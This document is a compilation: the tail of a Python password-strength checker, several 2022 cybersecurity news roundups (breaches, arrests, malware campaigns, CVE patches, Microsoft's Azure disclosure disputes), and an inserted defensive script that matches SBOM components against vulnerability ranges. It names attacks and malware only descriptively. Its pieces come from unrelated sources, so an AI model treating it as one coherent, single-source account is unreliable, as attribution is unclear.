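        return 0.0
    full = pw.lower()
    if full in COMMON_RANK:
        return math.log2(COMMON_RANK[full])
    word, digits = split_word_digits(pw)
    if word in COMMON_RANK:
        return math.log2(COMMON_RANK[word] * 10 ** len(digits))
    space = 0
    if re.search(r"[a-z]", pw):
        space += 26
    if re.search(r"[A-Z]", pw):
        space += 26
    if re.search(r"\d", pw):
        space += 10
    if re.search(r"[^a-zA-Z0-9]", pw):
        space += 33
    return len(pw) * math.log2(space)


def strength_label(bits):
    """Meter buckets. The meter never asks for a digit or a symbol; a long
    all-lowercase passphrase scores well simply because it is hard to guess."""
    if bits < 20:
        return "very weak"
    if bits < 40:
        return "weak"
    if bits < 60:
        return "fair"
    return "strong"


def evaluate(pw):
    """Practice 3: the only hard rule is a minimum length; everything else is
    feedback. Returns (accepted, message, log2 guesses)."""
    if len(pw) < MIN_LENGTH:
        return False, f"use at least {MIN_LENGTH} characters", 0.0
    bits = log2_guesses(pw)
    if leaked_rank(pw) is not None:
        return False, "this password appears in leaked-password lists", bits
    return True, f"strength: {strength_label(bits)}", bits


if __name__ == "__main__":
    for sample in ["rockyou2024", "P@ssw0rd1", "Tr0ub4dor&3",
                   "correct horse battery staple"]:
        print(f"{sample!r:32} -> {evaluate(sample)}")
```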
Romanian-based VPN provider BeanVPN appears to have leaked 25 million records. According to CyberNews, the leaked data included details such as user device IDs, Play Service IDs, internet protocol addresses (IPs), and connection timestamps, among other diagnostic information.
Elsewhere, an Elasticsearch server owned by PoS software vendor StoreHub also leaked the personal data of thousands of customers (companies) and more than one million of their staff, according to SafetyDetectives.
Rust Foundation grants
The Rust Foundation has announced its first-ever grants; funds the Foundation will be providing to open-source developers and programs for improving the Rust programming language and its integration with other projects. In total, $650,000 was dispensed to 41 recipients, including for projects improving Rust’s documentation, the Crates package repository, its Windows library, and others.
A bill proposed by Sen. Blumenthal (D-CT) meant to force companies like Apple and Google to open their in-store payment systems to other payment options is considered too broad, as it requires the tech companies to open all their APIs, including those used for sensitive operations, like encryption and backups. Even worse, as spotted by Johns Hopkins Prof. Matthew Green, the bill also contains a clause that can allow US law enforcement to close certain APIs to companies or entities that may be considered a “national security threat,” which Green argues could be used to go after encrypted messaging apps.
Around 25 Iranian Instagram accounts that shared stories of sexual violence and posted about the Iranian MeToo movement this spring were flooded with subscriptions from bot profiles. The Qurium Foundation, which investigated this harassment campaign, believes the attackers were trying to get the accounts banned for boosting.
Senator Elizabeth Warren (D-Mass.) introduced a bill on Wednesday to regulate the sale of Americans’ sensitive information. The bill—named the Health and Location Data Protection Act—would prohibit the sale or transfer of information about location and health data without valid authorization.
Alexa data used for ads
A new lawsuit filed this week claims that Amazon used audio recorded through the Alexa personal assistant to target users with personalized ads, a practice Amazon has long denied.
Google fined in Russia
A Russian court has fined Google 15 million rubles (~$260,000) after the company refused to store the data of Russian citizens on servers within the Russian Federation.
US authorities seized the website and infrastructure of RSocks, an online service selling access to proxy servers all over the world. Authorities said RSocks had been built on top of a botnet of hacked computers, smartphones, and IoT devices. The botnet, supposedly operated by Russian cybercriminals, had allegedly grown from 325,000 hacked devices in 2017 to millions of devices this year, the DOJ said in a press release on Thursday.
Call center and BEC arrests
Interpol said it detained more than 2,000 suspects as part of an international crackdown against BEC scammers, online fraudsters, romance scammers, money launderers, and scammy call center operators. The arrests were part of Operation First Light 2022, and authorities said they also froze more than 4,000 bank accounts and seized more than $50 million worth of stolen funds.
Dutch police have detained a 22-year-old from the city of IJmuiden on suspicion of being part of an online cybercrime group specialized in phishing and money laundering. The suspect had been detained at the request of Belgian authorities.
A Florida judge sentenced a 41-year-old man to nine years in federal prison for hacking into the iCloud accounts of more than 4,700 users, stealing sensitive images, and then sharing and trading the data on Anon-IB, a now-defunct website famous for hosting “revenge porn.” The man, Hao Kuo Chi of California, went by “icloudripper4you” on the forum, and authorities said he obtained and shared sensitive images from more than 500 of his hacked victims.
Russian hacker arrested
Russian officials have detained a man named Oleg Rusakovich on accusations of hacking into the systems of the Russian Federal Customs Services and modifying entries in the system to make sure certain goods cleared customs procedures.
Sophos has a report out on a series of attacks against Telerik UI-based apps. The final payload in these attacks has been Cobalt Strike beacons and crypto-miners.
ISC SANS is reporting on new campaigns distributing Houdini, a very old remote access trojan.
Initial access prices
Kaspersky’s threat intel team has a good report on the current prices on the initial access market for access to hacked corporate and government networks.
In a report on Wednesday, Akamai detailed Panchan, a new peer-to-peer botnet and SSH worm that emerged in March 2022 and has been actively compromising Linux servers since. The botnet is written in Go, and its main purpose appears to be cryptocurrency mining.
F5 says that while it was tracking FluBot, it found a new Android banking trojan named MaliBot. Current versions of the malware can carry out web injection and overlay attacks, steal MFA codes, steal authentication cookies, steal wallet data, steal SMS messages, and provide VNC access to infected devices for remote access, among many other features.
Qualys has a report out on the Redline Stealer and a recent campaign where threat actors used ZIP archives with fake cracked software to distribute the malware.
Security firm Lookout has published a report on Hermit, a piece of “enterprise-grade Android surveillanceware” that was used to spy on Kazakh government officials. The company said the malware was developed by Italian spyware vendor RCS Lab SpA and telecommunications company Tykelab Srl, and that previous instances where Hermit was also deployed included Italy (by law enforcement) and Syria.
Indian police framed reporters
Researchers at security firm SentinelOne and nonprofits Citizen Lab and Amnesty International told Wired that they found evidence to formally link the Pune Police Department to a case where fake evidence was planted on the laptops of two Indian activists (Rona Wilson and Varvara Rao) the same department detained in 2018 on terrorism-related charges. Previous reporting on their case had found that the evidence that led to their arrest was planted on their devices, but investigators could not identify who planted the evidence. The two activists, along with 16 other suspects, are still on trial in India.
Volexity said in a report on Wednesday that it spotted a new Chinese APT using a zero-day in the Sophos XG firewall in March this year. Named DriftingCloud, this threat actor used the Sophos XG zero-day (CVE-2022-1040) to install web shells on the firewall, create VPN accounts for future access, and then proceeded to intercept and tamper with DNS traffic in order to redirect the victim organization’s employees to malicious servers. These servers performed MitM attacks and collected credentials and authentication cookies for other internal apps, helping the attackers escalate their access to other internal company resources.
A Polish security researcher said they received a legal threat from Powertek after disclosing vulnerabilities in the company’s power distribution units. The company backed down on the threat a few hours later, calling it a miscommunication around the first-ever bug report they received.
Security researchers from Halborn discovered a vulnerability affecting many major cryptocurrency wallets. Named Demonic, the vulnerability takes place in situations where certain cryptocurrency wallet browser extensions accidentally store the wallet owner’s secret recovery phrase on disk, in plaintext, allowing attackers to recover it in situations where they have access to the victim’s device. Impacted wallets include MetaMask, Brave, Phantom, and xDefi. The vulnerability is tracked as CVE-2022-32969, and all the wallet makers have released fixes, according to the researchers.
Ninja Forms vulnerability
WAF provider Wordfence disclosed a major vulnerability in Ninja Forms, one of the most popular WordPress plugins today. The vulnerability allows unauthenticated remote code injection, has a CVSS score of 9.8/10, and patches are already out.
Proofpoint published new research this week describing a possible scenario in which a threat actor with access to a customer’s SharePoint or OneDrive account lowers the file versioning limit to “1” and then encrypts the files with ransomware twice, so that the victim organization no longer has access to earlier versions of the locked files. The good news is that, while the attack is plausible, Microsoft support staff can restore a customer’s files to any point within the previous 14 days, according to this support page and Matt Swann, Chief Security Architect for OneDrive and SharePoint at Microsoft.
After academics published details of the Hertzbleed attack earlier this week, a team of Intel researchers has published its own paper on the topic, along with more extensive and detailed mitigations to prevent possible attacks.
RDP vulnerability finally patched
CyberArk has a write-up on the backstory of a vulnerability in the Windows Remote Desktop feature that was initially disclosed in January and needed a second patch in April to plug all the attack holes.
Patch Tuesday is not ending
Someone started some dumb rumor that Microsoft will stop providing security updates during Patch Tuesdays. That’s obviously false, Microsoft told SecurityWeek.
GitHub said on Wednesday that every time it would detect a threat actor’s attempt to insert malware into open-source projects, it would also add an entry in its GitHub Advisory Database, a place the company previously logged only vulnerability-related issues.
The schedule for this year’s Black Hat Arsenal edition has been made public. Black Hat Arsenal is the conference tracklist where security researchers present new infosec-related tooling.
Firmware security firm Eclypsium has expanded its leadership team.
Security researcher Marcus “MalwareTech” Hutchins has released a tool that can extract payloads from Office files weaponized with the Follina zero-day.
Security firm PIXM has released a report on a massive and successful Facebook phishing campaign. The campaign used legitimate services such as famous.co and glitch.me to redirect to phishing pages. Once phishing links on these services were detected and blocked, new ones were rapidly created at a new unique id. As these services were legitimate, Facebook wasn’t able to block them en masse, and the person(s) responsible would use compromised Facebook accounts to send phishing links to contacts on Facebook Messenger.
PIXM discovered the campaign had openly available traffic monitoring statistics and they extrapolate the phishing sites in aggregate may have received around 400m sessions, although they believe they have seen only a fraction of the campaign. Bring on passwordless login systems.
Ransomware is Underreported
At the RSA conference this week, FBI and Department of Justice officials reported that only a quarter of NetWalker ransomware victims reported incidents to law enforcement. Officials were able to get comprehensive information about attacks and even build a decryptor after seizing NetWalker servers in Bulgaria in 2020.
Good News, More BEC!
Wired covers the argument that, as governments crack down on ransomware and illicit cryptocurrency payments, criminals may migrate from ransomware to Business Email Compromise. This makes sense, as BEC is already more profitable than ransomware, and it could well be good news since BEC causes less operational disruption.
Firefox upping privacy
Firefox is rolling out “Total Cookie Protection”, which limits cookies, even for third-party content, to only the website that assigned that cookie. Mozilla says “this approach strikes the balance between eliminating the worst privacy properties of third-party cookies — in particular the ability to track you — and allowing those cookies to fulfil their less invasive use cases (e.g. to provide accurate analytics)”. This is really the way it should have been all along.
Splunk Releases Critical Update
Splunk released an emergency patch this week, addressing a critical vulnerability that could lead to arbitrary code execution. The vulnerability, CVE-2022-32158, has a CVSS score of 9.0. An attacker taking advantage of the flaw could execute code on endpoints connected to a particular deployment server. Splunk released patches only for Splunk 9.0; users of older versions need to upgrade to 9.0 to patch.
- If you’re on Splunk 9.0, you will need to apply the patch. Due to the newness of the patch, you may wish to wait for any updates/issues to be squared away. If you’re doing that, you need to disable the deployment server unless you’re actively using it to deploy configuration updates. The ISC blog below has details on this approach. If you’re not on Splunk 9.0, time to roll up your sleeves and get that update going.
- This does not impact Splunk Cloud users, so it is relevant to a bit more than half of Splunk customers. SaaS vendors have a simpler patching issue than IaaS vendors, but in procurement it is very important to ask about and evaluate the vendor’s patch time commitments, their use of external Cloud Service Providers and DoS protection, as well as broader security processes and controls. Like many security software vendors, Splunk is seeing its cloud business grow more than twice as fast as on-premises deployments. But margins (profit on sales) are still lower for cloud sales vs. on-premise. Important to keep the pressure on all security vendors to make sure cloud security of their own offering is Job 1, even as they look to constrain costs to improve cloud profit.
Read more in
- Critical vulnerability in Splunk Enterprise’s deployment server functionality
- Splunk Enterprise deployment servers allow client publishing of forwarder bundles
- Critical Code Execution Vulnerability Patched in Splunk Enterprise
Microsoft Patch Tuesday Updates Include Follina Fix
On Tuesday, June 14, Microsoft released updates that address 60 security issues in a range of products. The updates include a patch for the Follina flaw in the Microsoft Support Diagnostic Tool (MSDT). Three of the vulnerabilities fixed in this batch of updates have been deemed critical; the three remote code execution vulnerabilities affect Windows Network File System, Windows Hyper-V, and Windows Lightweight Directory Access Protocol.
- The Follina fix was issued with a release date of May 30th, which caused a bit of confusion as it wasn’t part of the June 14th set of patches. But it is included in the rollup patches. Please apply expeditiously. Also note the NFS patch. While not enabled by default, this is the third month in a row for NFS patches and this time, additional details regarding the vulnerability have been published by the discoverer making an exploit more likely.
- The patches address both the MSDT flaw and the Windows Network File System flaws. The NFS 4.1 fix is for your servers, and while critical, you may wish to test prior to wide deployment. Also, in case you’re missing it, June 15 is the de-support date for IE – take care of your support and IT teams this month, it’s going to be busy.
Read more in
- Microsoft June 2022 Patch Tuesday
- Microsoft Patch Tuesday, June 2022 Edition
- Microsoft Patches ‘Follina’ Zero-Day Flaw in Monthly Security Update
- Follina vulnerability fixed in latest Patch Tuesday release from Microsoft
- Microsoft fixes under-attack Windows zero-day Follina
- Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability
- Security Update Guide
Microsoft Called Out for Dragging its Feet on Azure Fixes
Orca Security and Tenable both say that Microsoft has taken too long to address critical flaws in Azure. Orca Security’s Tzah Pahima said that Microsoft took more than four months to adequately fix a critical vulnerability in Azure’s Synapse Analytics. Researchers from Tenable detected two vulnerabilities in Synapse Analytics and reported them to Microsoft in early March; the issues were not acknowledged for nearly three months.
- Using the cloud (aka “someone else’s computer”) requires trust. Delayed fixes and missing transparency about the risks your data is exposed to does not build trust. On the other hand: As long as it is cheap and easy enough, people will probably use it anyway.
- I started Gartner’s coverage of cloud service security back in 2010 or so, and a key issue was how cloud service providers would patch their underlying infrastructure. Testing patches to make sure a 10,000 user enterprise isn’t impacted is tough enough – Microsoft has over 700M users on Azure Active Directory. Obviously, Microsoft has the biggest problem since Windows vulnerabilities get outed the quickest, but Amazon AWS has the biggest market share (over 1M users). They have to walk the line between the risk of customers being compromised by attackers exploiting the vulnerability and a too-fast push out of patches that aren’t fully tested, leading to downtime at hundreds to thousands of customers. Right now, Microsoft is erring on the side of avoiding the latter, which is probably prudent since some recent MSFT patches have had to be recalled.
- It took Microsoft three tries to fix the vulnerability; the full fix was released in May. We have seen multiple patch cycles previously. The risk is that with cloud services you’re not only dependent on the software provider for the fix, just as with on-prem, but also restricted to the mitigations they provide, which is unlike on-premise services. Make sure that you’re considering this risk, weighed against the provider’s track record of deploying updates and inclusion of possible compensating security measures.
Read more in
- Azure issues not adequately fixed for months, complain bug hunters
- Researchers claim it took Microsoft over 100 days to patch Azure Synapse vulnerability
- Botched and silent patches from Microsoft put customers at risk, critics say
- SynLapse – Technical Details for Critical Azure Synapse Vulnerability
- Microsoft Azure Synapse Pwnalytics
- Microsoft’s Vulnerability Practices Put Customers At Risk
US HHS Security Risk Assessment Tool Version 3.3
The US Department of Health and Human Services (HHS) Office for Civil Rights (OCR) and National Coordinator for Health Information Technology (ONC) have released the Security Risk Assessment (SRA) Tool version 3.3. SRA “is designed to help healthcare providers conduct a security risk assessment as required by the HIPAA Security Rule and the Centers for Medicare and Medicaid Service (CMS) Electronic Health Record (EHR) Incentive Program.”
- This is just a port of the paper version of the OCR Security Risk Assessment tool to electronic/spreadsheet format. So, if you were already using the paper version, it is much easier to use. But the questionnaire is heavy on policy and compliance, much lighter on actual security defenses/controls. A decent starting point if you are starting from scratch, but it will also need tailoring for most environments. There are 64 questions with “I don’t know” as a possible answer. The spreadsheet logic will show those as yellow if you use that answer, but a “Huh?” response should be high risk/red – if you answer “I don’t know” on more than a handful, time to stop and get a detailed security assessment performed.
- Download the tool from the HealthIT.gov Security Risk Assessment Tool website (see link below). It is available as an application for Windows 7/8/10/11 systems which stores data locally, or as an Excel workbook. The questions include guidance for each of your possible answers, whether it is required, and the source for the question. Sections also include Threats and Vulnerabilities questions which you can leverage to see your risk score. Allow sufficient time to honestly assess yourself, and resist the blame game. If you find yourself with a lot of critical or high-risk scores, or I-don’t-know answers, consider a professional engagement to help you both verify your assessment and devise a risk-based path forward.
Read more in
- ONC, OCR Release Updated Version of HHS Security Risk Assessment (SRA) Tool
- Security Risk Assessment Tool
Healthcare Entities Respond to HHS RFI on Cybersecurity Requirements
In April, the US Department of Health and Human Services (HHS) published a request for information (RFI) seeking public comment on current healthcare security practices and how HHS Office for Civil Rights (OCR) can help healthcare entities implement security measures. A common thread throughout comments from several healthcare-related organizations is that cybersecurity requirements need to be flexible rather than one size fits all.
- Most of the reaction has been because HHS OCR is asking many questions on how best to determine monetary penalties for failure to protect personal health information. HIPAA has been out since 1996, HITECH since 2009; OCR enforcement actions did not start until 2017 and have been mostly driven by complaints, not by proactive assessments – since 2017, OCR has had 105,189 complaints and only 1,739 compliance reviews, and fines were assessed in only 0.06% of cases, roughly 1 out of 1,500. Bottom line: the most likely outcome is language accepting use of widely accepted frameworks, followed by increased proactive assessment and a higher occurrence of fines. Legislation moves slowly – the earliest start is probably FY 24. So, develop a 2-3 year strategic gap closure plan to convince management to fund progress over that period to avoid future punitive actions (sounds scarier than just saying fines…)
- Security frameworks need to be viewed both from a risk perspective and as a minimum bar. Use them to identify potential gaps in your protections, and document your decisions.
Read more in
- Should healthcare cybersecurity framework be one-size-fits-all?
- RE: Considerations for Implementing the Health Information Technology for Economic and Clinical Health (HITECH) Act, as Amended (PDF)
Cloudflare Says it Mitigated a 26M rps DDoS Attack
Cloudflare detected and thwarted a 26 million request per second (rps) distributed denial-of-service (DDoS) attack against one of its customers. The attack occurred last week. It was the work of a botnet comprising just over 5,000 devices, mostly servers and virtual machines belonging to cloud service providers. In a blog post, Cloudflare’s Omer Yoachimik writes that the botnet was “4,000 times stronger [than most other botnets] due to its use of virtual machines and servers.”
- Since extended DDoS attacks can cause cloud service providers to start failing to meet service level agreements, the larger CSPs generally have strong DDoS filtering in place, usually a mixture of filtering in their own data centers and the use of services like Cloudflare or Akamai/Prolexic. Make sure the security group is involved in evaluating cloud service procurements to assure that such hybrid DDoS protection is part of the bid – payouts on SLA failure only give your company rebates on future bills; no business interruption costs are included.
- Even though this thwarted attack was targeting services on the free tier Cloudflare plan, verify your CDN provides DDoS protections on the service you’re using. Cloudflare is comparing the relative impact for small device/IoT botnets (730,000 devices) versus smaller collections of server class nodes (5,067 devices). The larger botnet only generates 1.3 million rps, meaning while protecting your IoT devices is key, it’s still paramount to consider your physical and virtual servers as high value targets for acquisition. Pay particular attention to unexpected workload bursts, consistent with DDoS attack duration.
Read more in
- Cloudflare mitigates 26 million request per second DDoS attack
- Cloudflare says it thwarted record-breaking HTTPS DDoS flood
- A tiny botnet launched the largest DDoS attack on record
- Tsunami of junk traffic that broke DDoS records delivered by tiniest of botnets
- Cloudflare mitigates record-breaking HTTPS DDoS attack
Hertzbleed Side-Channel Attack
A newly-detected side-channel attack affects Intel and AMD x86 processors. Dubbed Hertzbleed, the flaw can be exploited to steal cryptographic keys by observing CPU frequency variations in the dynamic voltage and frequency scaling (DVFS) CPU-throttling technology. The researchers who detected the vulnerability acknowledged that exploits would require complex attacks. Intel and AMD do not have plans to release fixes.
Read more in
- New Hertzbleed side-channel attack affects Intel, AMD CPUs
- ‘Hertzbleed’ Side-Channel Attack Threatens Cryptographic Keys for Servers
- Frequency Throttling Side Channel Software Guidance for Cryptography Implementations
- Hertzbleed: Turning Power Side-Channel Attacks Into Remote Timing Attacks on x86 (PDF)
Citrix Fixes ADM Vulnerabilities
Citrix has released updates to address a pair of flaws affecting Citrix Application Delivery Management (ADM). An improper access control vulnerability could be exploited to allow a remote, unauthenticated user to corrupt the system and potentially reset the administrator password. An improper control of a resource through its lifetime issue could be exploited to temporarily disrupt the ADM license service. The flaws affect all supported versions of Citrix ADM server and Citrix ADM agent. Users are urged to upgrade to the most recent versions.
Read more in
- Citrix Application Delivery Management Security Bulletin for CVE-2022-27511 and CVE-2022-27512
- Critical Citrix Bugs Impact All ADM Servers, Agents
- Citrix warns critical bug can let attackers reset admin passwords
Latin American Governments Face Serious Ransomware Risks
Latin American governments face a significant risk from ransomware attacks due to poor cyber hygiene, inadequate education, and immature infrastructure, according to researchers from Recorded Future’s Insikt Group. The researchers note that “If unaddressed, ransomware attacks on local, provincial, or federal government entities in LATAM could constitute a credible national and geopolitical security risk.”
- This is about cyber hygiene. Attackers are leveraging compromised credentials, which is best mitigated through the use of MFA. If you must hang on to reusable credentials, use services to check breach dumps for compromised credentials, to include rapid action for discovered compromised accounts.
- We have witnessed successful ransomware attacks against public sector bodies throughout the United States and Europe. There is no reason not to expect similar types of victims in other regions such as Latin America.
Read more in
- Latin American Governments Targeted By Ransomware
- Latin America governments are prime targets for ransomware due to lack of resources, analysis argues
- Latin American Governments Easy Prey for Ransomware During COVID-19 (from January 5, 2022)
Ukraine’s Internet Routed Through Russia
Ukrainian internet companies are reportedly being forced to reroute their traffic through Russia or shut down their connections. Russian troops are seizing Ukrainian Internet providers’ equipment and ordering employees to reroute traffic; if they refuse, the troops are able to make the changes themselves. In addition, a new mobile company in the city of Kherson appears to be selling SIM cards that connect to a network whose numbers use the international prefix for Russia. Cloudflare’s head of data insight David Belson said, “Controlling internet access and being able to manipulate the internet access into an occupied area” is a “new front.”
- On the Internet, anything beyond the network jack in your system should be considered hostile anyway. Russia would be negligent not to reroute networks they physically control.
- This is why end-to-end encryption is so important. Encryption is not just a tool to protect privacy, it is also a critical security tool which not only protects data but, as exemplified here, can protect people’s lives and their freedoms. Those looking for backdoors into encryption need to role play what would happen if a hostile and/or oppressive government had access to individuals’ internet traffic.
- The Ukrainian ISPs don’t have a lot of choice here, as the Russians are able to make the changes if they refuse, and have physical access to the network equipment to obtain access. Watch to see if users can successfully use VPNs to bypass anticipated restrictions of access and attempted monitoring. If you are unsure of the network, wired/wireless or cellular you’re using, use a VPN to secure the connection to a trusted exit point. Note that some services filter connection methods some VPNs use, so be prepared to use alternate offerings.
Read more in
SBOMs Need to be Mapped to Known Vulnerabilities
In a blog post, Google’s Open Source Security Team observes that a software bill of materials (SBOM) by itself is not useful for determining security risks. Instead, a SBOM “needs to be mapped onto a list of known vulnerabilities to know which components could pose a threat.” The blog goes on to describe the process of using an open source tool to identify vulnerabilities in components included in a SBOM.
- Short response is that no single action alone is complete for determining, let alone mitigating, software supply chain risks or any risk. SBOMs will have to be part of the solution, but the starting point is enterprises having accurate software inventories – the apps most likely to be compromised are the ones that are NOT in IT’s configuration management database or spreadsheet of software licenses.
- Information to make informed decisions is important. The usefulness of SBOMs will depend on how we consume/analyze them. It may become tricky to keep up with SBOM evaluation due to rate of update or complexity unless we have trusted automation to identify risks.
Read more in
- SBOM in Action: finding vulnerabilities with a Software Bill of Materials
- Google: SBOMs Effective Only if They Map to Known Vulns
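The mapping step the Google post describes, as an added example that is neither the post’s tool nor the newsletter’s code: parse the component purls out of a CycloneDX SBOM and test each version against OSV-style affected ranges. The SBOM, the advisory records and their IDs are constructed stand-ins, and the version ordering is a simplified numeric one (real ecosystems need their own comparison rules).

```python
"""Added example, not the Google blog's tool or the newsletter's code: map
a CycloneDX SBOM onto a list of known vulnerabilities. The SBOM, the
advisory records (in the shape of OSV entries) and the EXAMPLE-VULN IDs
are constructed stand-ins; real use would query a vulnerability database."""
import json
import re
from urllib.parse import unquote

# Constructed CycloneDX 1.4 SBOM with three components.
SBOM_JSON = """{
  "bomFormat": "CycloneDX", "specVersion": "1.4",
  "components": [
    {"type": "library", "name": "lodash", "version": "4.17.20",
     "purl": "pkg:npm/lodash@4.17.20"},
    {"type": "library", "name": "log4j-core", "version": "2.17.1",
     "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.17.1"},
    {"type": "library", "name": "core", "version": "12.0.0",
     "purl": "pkg:npm/%40angular/core@12.0.0"}
  ]
}"""

# Constructed advisory records in OSV shape; the IDs are placeholders.
ADVISORIES = [
    {"id": "EXAMPLE-VULN-0001", "summary": "prototype pollution (constructed)",
     "affected": [{"package": {"ecosystem": "npm", "name": "lodash"},
                   "ranges": [{"type": "ECOSYSTEM", "events": [
                       {"introduced": "0"}, {"fixed": "4.17.21"}]}]}]},
    {"id": "EXAMPLE-VULN-0002", "summary": "remote code execution (constructed)",
     "affected": [{"package": {"ecosystem": "Maven",
                               "name": "org.apache.logging.log4j:log4j-core"},
                   "ranges": [{"type": "ECOSYSTEM", "events": [
                       {"introduced": "2.0"}, {"fixed": "2.17.1"}]}]}]},
]

# pkg:type/[namespace/]name@version ; qualifiers and subpath are ignored here.
PURL_RE = re.compile(
    r"^pkg:(?P<type>[^/]+)/(?:(?P<ns>[^/@]+)/)?(?P<name>[^/@]+)@(?P<version>[^?#]+)")
ECOSYSTEM = {"npm": "npm", "maven": "Maven", "pypi": "PyPI"}  # purl type -> OSV name


def parse_purl(purl):
    """Return (ecosystem, package name as OSV spells it, version)."""
    m = PURL_RE.match(purl)
    if not m:
        raise ValueError(f"unsupported purl: {purl}")
    ptype, ns, name, version = m.group("type", "ns", "name", "version")
    ns = unquote(ns) if ns else None  # %40angular -> @angular
    if ptype == "maven" and ns:
        name = f"{ns}:{name}"  # OSV uses group:artifact for Maven
    elif ns:
        name = f"{ns}/{name}"  # scoped npm packages keep the slash
    return ECOSYSTEM.get(ptype, ptype), name, version


def version_key(v):
    """Numeric dotted-version ordering; sufficient for the samples here.
    Semver pre-releases, PEP 440 and Maven qualifiers need ecosystem rules."""
    return tuple(int(p) if p.isdigit() else -1 for p in re.split(r"[.\-+]", v))


def in_range(version, events):
    """OSV range semantics: a version is affected if the last event at or
    below it is 'introduced' (inclusive); 'fixed' is exclusive; '0' means
    every version. Events may arrive in any order, so sort them first."""
    v = version_key(version)
    points = []
    for ev in events:
        if "introduced" in ev:
            key = () if ev["introduced"] == "0" else version_key(ev["introduced"])
            points.append((key, True))
        elif "fixed" in ev:
            points.append((version_key(ev["fixed"]), False))
    state = False
    for key, introduced in sorted(points):
        if key <= v:
            state = introduced
    return state


def scan(sbom_json, advisories):
    """Return {purl: [advisory ids]} for every component whose
    (ecosystem, name, version) falls inside an affected range."""
    findings = {}
    for comp in json.loads(sbom_json).get("components", []):
        eco, name, version = parse_purl(comp["purl"])
        hits = []
        for adv in advisories:
            for aff in adv["affected"]:
                pkg = aff["package"]
                if (pkg["ecosystem"], pkg["name"]) != (eco, name):
                    continue
                if any(in_range(version, r["events"])
                       for r in aff["ranges"] if r["type"] == "ECOSYSTEM"):
                    hits.append(adv["id"])
        if hits:
            findings[comp["purl"]] = hits
    return findings


if __name__ == "__main__":
    for purl, ids in scan(SBOM_JSON, ADVISORIES).items():
        print(purl, "->", ", ".join(ids))
```

Note that log4j-core 2.17.1 sits exactly on the constructed range’s `fixed` boundary and is correctly reported as not affected.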
Cloud Security Alliance: Top Cloud Computing Risks
The Cloud Security Alliance has published a report identifying the top cloud computing security risks faced by cybersecurity experts. Among things they noticed – a shift in cloud security responsibility from the service provider to the cloud adopter. The number one risk CSA identified is insufficient identity, credentials, access, and key management, which are the responsibility of cloud adopters. Other top risks include insecure interfaces and APIs; misconfiguration and inadequate change control; lack of cloud security architecture and strategy; and unsecure software development.
- The report includes business impact, key takeaways, examples, and security guidance for each of these risks. Use this to develop processes to ensure minimum security practices are implemented for your current and future cloud services.
Read more in
- cloudsecurityalliance.org: Top Threats to Cloud Computing Pandemic Eleven
Prison Time for Selling DDoS Attack Services
A US district judge in California sentenced Matthew Gatrel to two years in prison for operating distributed-denial-of-service (DDoS) attack-for-hire websites. The sites Gatrel ran launched more than 200,000 DDoS attacks. In September 2021, Gatrel was found guilty of conspiracy to commit unauthorized impairment of a protected computer, conspiracy to commit wire fraud, and unauthorized impairment of a protected computer. A co-defendant pleaded guilty before the trial began.
- This is similar to moving from arresting and sentencing one person buying drugs or weapons to doing so to a dealer selling to dozens – obviously a good thing. The next step is going after the sketchy hosting/IaaS companies providing capacity to some “cybercrime as a service” criminals. Even better would be ISP ingress and egress filtering of obviously malicious traffic.
- Having DDoS protection must become SOP for internet facing services. While court cases like this may provide some deterrence, having active technical countermeasures in place will provide a more rapid return, and possibly help your CISO sleep at night.
Read more in
- “Downthem” DDoS-for-Hire Boss Gets 2 Years in Prison
- Man gets two years in prison for selling 200,000 DDoS hits
- Illinois Man Sentenced to 2 Years in Federal Prison for Operating Subscription-Based Computer Attack Platforms
40 high-severity vulnerabilities included in June’s Patch Tuesday
Microsoft released its monthly security update Tuesday, disclosing 55 vulnerabilities in the company's firmware and software. One of these vulnerabilities is considered critical, 40 are listed as high severity, and the remainder are considered "moderate." The most serious issue is CVE-2022-30136, a remote code execution vulnerability in the Windows Network File System (NFS) service, version NFSv4.1, with a near-maximum severity score of 9.8. An attacker can exploit the vulnerability over the network by making an unauthenticated, specially crafted call to an NFS service to execute remote code. To mitigate this vulnerability, users are advised to disable the vulnerable version NFSv4.1 and restart the NFS server or reboot the machine. Microsoft SharePoint Server contains a remote code execution vulnerability, CVE-2022-30157, with a severity score of 8.8.
Symbiote malware can remain undetected on Linux machines
A new Linux malware that can go undetected on infected machines is being used to target the financial sector in Latin America. Once the “Symbiote” malware infects the machine, it hides itself, making infections hard to detect. If successful, the malware provides a backdoor for the threat actor and allows them to log in as any user on the machine with a hardcoded password. They can also execute arbitrary code on the infected machine with the highest privileges. Because of its stealth, security researchers are unaware how widespread the campaign currently is and are unsure if it can even be detected by conventional security software.
Microsoft accused of concealing Azure vulnerabilities
Amit Yoran, the CEO of vulnerability management platform Tenable, published a LinkedIn post on Monday accusing Microsoft of downplaying the severity of two Azure vulnerabilities his team reported to the company earlier this year, and only patching one of them.
Quoting from a blog post by James Sebree, Principal Research Engineer at Tenable:
“It took entirely too much effort to get any sort of meaningful response from our case agent. Despite numerous attempts at requesting status updates via emails and the researcher portal, it wasn’t until we reached out via Twitter that we would receive responses. During the disclosure process, Microsoft representatives initially seemed to agree that these were critical issues. A patch for the privilege escalation issue was developed and implemented without further information or clarification being required from Tenable Research. This patch was also made silently and no notification was provided to Tenable. We had to discover this information for ourselves.
During the final weeks of the disclosure process, MSRC began attempting to downplay this issue and classified it as a “best practice recommendation” rather than a security issue. […] It wasn’t until we notified MSRC of the intent to publish our findings that they acknowledged these issues as security-related. At the eleventh hour of the disclosure timeline, someone from MSRC was able to reach out and began rectifying the communication mishaps that had been occurring.
But while this looks like a bungled bug report, both Yoran and Sebree say this is part of a larger trend and “repeated pattern of behavior” where Microsoft intentionally tries to downplay or hide a security issue from its customers.
The two point to similar recent reports from companies like Wiz and Orca Security, both of which have had to deal with Microsoft botching patches and trying to hide the issue from its customers.
“For an IT infrastructure provider or a cloud service provider that is not being transparent, the stakes are raised exponentially,” Yoran said on Monday.
“Without timely and detailed disclosures, customers have no idea if they were, or are, vulnerable to attack…or if they fell victim to attack prior to a vulnerability being patched. And not notifying customers denies them the opportunity to look for evidence that they were or were not compromised, a grossly irresponsible policy,” he added.
“The fox is guarding the henhouse,” Yoran said.
But the reason we chose to highlight this issue goes far beyond how Microsoft deals with the disclosure of vulnerabilities in its Azure cloud service.
While the OS maker has gone through a period in recent years where it was far more open with security researchers and its patching process, it appears to be going back into its shell again and actively trying to hide the severity of certain security issues from its users.
